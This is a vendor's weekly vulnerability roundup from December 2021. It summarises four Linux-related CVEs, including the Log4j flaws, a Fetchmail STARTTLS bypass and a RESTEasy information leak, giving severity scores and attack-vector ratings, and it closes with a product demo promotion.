
Linux Vulnerabilities of the Week: December 20, 2021
See this week's top Linux issues and keep your IT environment protected from the latest December Linux vulnerabilities.
1. Apache Log4j logging library vulnerability
Severity: Critical CVSS Score: 10.0
This is a flaw in Apache that allows an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
Syxscore Risk Alert
This vulnerability has a major risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope (Jump Point): Changed
CVE Reference(s): CVE-2021-44228
2. Java logging library Apache Log4j (version 1.x) flaw affecting Red Hat Enterprise Linux 8
Severity: Important CVSS Score: 8.1
MSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker’s JMS Broker.
The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
Syxscore Risk Alert
This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, without privileges and user interaction.
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: None
- Scope (Jump Point): Unchanged
CVE Reference(s): CVE-2021-4104
3. STARTTLS session encryption bypassing in Fetchmail (< 6.4.22) affecting Red Hat Enterprise Linux 8
Severity: Medium CVSS Score: 5.9
Fetchmail before 6.4.22 fails to enforce STARTTLS session encryption in some circumstances, such as a certain situation with IMAP and PREAUTH.
The highest threat from this vulnerability is to data confidentiality.
Syxscore Risk Alert
This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, without privileges and user interaction.
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: None
- Scope (Jump Point): Unchanged
CVE Reference(s): CVE-2021-39272
4. RESTEasy (<4.6.0.Final) vulnerability
Severity: Medium CVSS Score: 5.3
This is a flaw in all versions of RESTEasy up to 4.6.0.Final. The endpoint class and method names are returned as part of the exception response when RESTEasy cannot convert one of the request URI path or query values to the matching JAX-RS resource method’s parameter value. The highest threat from this vulnerability is to data confidentiality.
Syxscore Risk Alert
This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction.
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope (Jump Point): Unchanged
CVE Reference(s): CVE-2021-20289

Schedule Your Syxsense Demo
Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.